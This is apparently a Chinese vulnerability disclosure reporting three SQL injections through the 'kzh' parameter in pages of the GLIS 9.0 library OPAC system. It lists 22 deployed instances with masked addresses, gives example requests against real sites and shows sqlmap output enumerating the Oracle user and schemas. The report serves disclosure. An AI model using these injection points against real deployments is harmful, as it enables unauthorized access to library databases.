### 简要描述:
RT
### 详细说明:
```
厂商:北京清大新洋科技有限公司
官网:http://**.**.**.**/
用户:http://**.**.**.**/yonghu.html
```
这系统卖的挺贵的啊,看产品报价:http://**.**.**.**/cp/glis90.html
```
产品名称:通用图书馆集成系统GLIS9.0
市场价格:198000元(FOR WIN)、228000元(FOR UNIX)
代理价格:138600元(FOR WIN)、159600元(FOR UNIX)
其它:以上报价为基本版,每增加一个用户加5000元。
```
每次提洞在wooyun先看前辈的洞,然后接着挖
http://**.**.**.**/bugs/wooyun-2010-099335
http://**.**.**.**/bugs/wooyun-2014-079840
http://**.**.**.**/bugs/wooyun-2010-085319
http://**.**.**.**/bugs/wooyun-2010-082667
看到用户还是有点哆嗦的。。。看截图
[<img src="https://images.seebug.org/upload/201508/0618032964f830713c6edfa51de4943830deebd0.png" alt="client.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201508/0618032964f830713c6edfa51de4943830deebd0.png)
因为案例较多,随便一搜就很多:
这里来一些(22个):
```
http://**.**.**.**:8000/opac/
http://**.**.**.**/opac/
**.**.**.**:8090/opac/
**.**.**.**:8089/opac/
http://**.**.**.**:8090/opac/
**.**.**.**:8089/opac/
**.**.**.**:8089/opac/
**.**.**.**:8070/opac/
http://**.**.**.**:8000/opac/
**.**.**.**:8070/opac/
**.**.**.**/opac/
http://**.**.**.**:8070/
**.**.**.**:8086/opac/
**.**.**.**:8088/opac/
**.**.**.**:8089/opac/
**.**.**.**:8070/opac/
**.**.**.**:8080/opac/
**.**.**.**:8089/opac/
**.**.**.**:8070/opac/
**.**.**.**:8070/opac/
**.**.**.**:8070/opac/
**.**.**.**:8070/opac/
```
下面就闲话少说,看洞:
注入一:
```
文件:xskp.jsp
POST参数kzh存在注入
```
注入二:
```
文件:ckmarc.jsp
POST参数kzh存在注入
```
注入三:
```
文件:eaaldetail.jsp
参数:kzh存在注入
```
上述三个洞均已排除前人提交的漏洞,无重复。每个注入拿两个案例证明
注入一、===========================================
案例1、
```
**.**.**.**:8088//opac/xskp.jsp
POST:
kzh=zyk0040640&dztm=&dctm=
```
[<img src="https://images.seebug.org/upload/201508/061814515b3d8f2583b3399344f9cce82274b811.png" alt="0806_2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201508/061814515b3d8f2583b3399344f9cce82274b811.png)
[<img src="https://images.seebug.org/upload/201508/061816257132ec0b52b8b5b711ca016649e2a454.png" alt="0806_2_1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201508/061816257132ec0b52b8b5b711ca016649e2a454.png)
数据信息(17个库):
```
web application technology: JSP
back-end DBMS: Oracle
[18:13:30] [INFO] fetching current user
[18:13:30] [WARNING] reflective value(s) found and filtering ou
current user: 'USRGLIS'
[18:13:30] [INFO] fetching current database
current schema (equivalent to database on Oracle): 'USRGLIS'
[18:13:30] [WARNING] schema names are going to be used on Oracl
as the counterpart to database names on other DBMSes
[18:13:30] [INFO] fetching database (schema) names
available databases [17]:
[*] CTXSYS
[*] DBSNMP
[*] DMSYS
[*] EXFSYS
[*] MDSYS
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] SCOTT
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TSG
[*] TSMSYS
[*] USRGLIS
[*] WMSYS
[*] XDB
```
案例2、
```
**.**.**.**:8080/opac/xskp.jsp
POST:kzh=zyk0040640&dztm=&dctm=
```
[<img src="https://images.seebug.org/upload/201508/061856095f66bfa34d266fbf75e10e3256f1a76f.png" alt="0806_2_2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201508/061856095f66bfa34d266fbf75e10e3256f1a76f.png)
注入二、===========================================
案例1、
```
**.**.**.**:8088//opac/ckmarc.jsp
POST:
kzh=zyk0040640
```
[<img src="https://images.seebug.org/upload/201508/061819592384239069361d0781f03b20262daae5.png" alt="0806_3.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201508/061819592384239069361d0781f03b20262daae5.png)
案例2、
```
**.**.**.**:8080/opac/ckmarc.jsp
POST:kzh=zyk0040640
```
[<img src="https://images.seebug.org/upload/201508/0618405455c9d5acc8a86ac2bdab7806ae12f1e6.png" alt="0806_3_1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201508/0618405455c9d5acc8a86ac2bdab7806ae12f1e6.png)
数据库信息:
```
web application technology: JSP
back-end DBMS: Oracle
[18:36:49] [INFO] fetching current user
current user: 'USRGLIS'
[18:36:49] [INFO] fetching current database
current schema (equivalent to database on Oracle): 'USRGLIS'
[18:36:49] [WARNING] schema names are going to be used on Oracle
as the counterpart to database names on other DBMSes
[18:36:49] [INFO] fetching database (schema) names
[18:36:51] [INFO] the SQL query used returns 9 entries
[18:36:51] [INFO] starting 5 threads
[18:36:52] [INFO] retrieved: "EXFSYS"
[18:36:52] [INFO] retrieved: "APEX_030200"
[18:36:52] [INFO] retrieved: "MDSYS"
[18:36:52] [INFO] retrieved: "CTXSYS"
[18:36:52] [INFO] retrieved: "OLAPSYS"
[18:36:55] [INFO] retrieved: "SYSTEM"
[18:36:55] [INFO] retrieved: "XDB"
[18:36:55] [INFO] retrieved: "USRGLIS"
[18:36:55] [INFO] retrieved: "SYS"
available databases [9]:
[*] APEX_030200
[*] CTXSYS
[*] EXFSYS
[*] MDSYS
[*] OLAPSYS
[*] SYS
[*] SYSTEM
[*] USRGLIS
[*] XDB
```
注入三、===========================================
案例1、
```
**.**.**.**:8088//opac/eaal/eaaldetail.jsp?kzh=zyk0040640
```
[<img src="https://images.seebug.org/upload/201508/0618254135bda86510a260cb41dc93ce9986e677.png" alt="0806_7.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201508/0618254135bda86510a260cb41dc93ce9986e677.png)
看看用户和库
[<img src="https://images.seebug.org/upload/201508/0618263917411ed469dc3e46bf28d43ede2fd147.png" alt="0806_7_1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201508/0618263917411ed469dc3e46bf28d43ede2fd147.png)
案例2、
```
**.**.**.**/opac/eaal/eaaldetail.jsp?kzh=zyk0040640
```
[<img src="https://images.seebug.org/upload/201508/06182746c7ad5866d663b8fa272b751e5211a256.png" alt="0806_7_6.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201508/06182746c7ad5866d663b8fa272b751e5211a256.png)
案例3、
```
**.**.**.**:8080/opac/eaal/eaaldetail.jsp?kzh=zyk0040640
```
[<img src="https://images.seebug.org/upload/201508/0618294063a18b87a858100b7917a0f38c50fba1.png" alt="0806_7_3.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201508/0618294063a18b87a858100b7917a0f38c50fba1.png)
数据库:
[<img src="https://images.seebug.org/upload/201508/061830018b1742706fe9884cd670f104b520fc96.png" alt="0806_7_4.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201508/061830018b1742706fe9884cd670f104b520fc96.png)
### 漏洞证明:
已证明
全部评论 (1)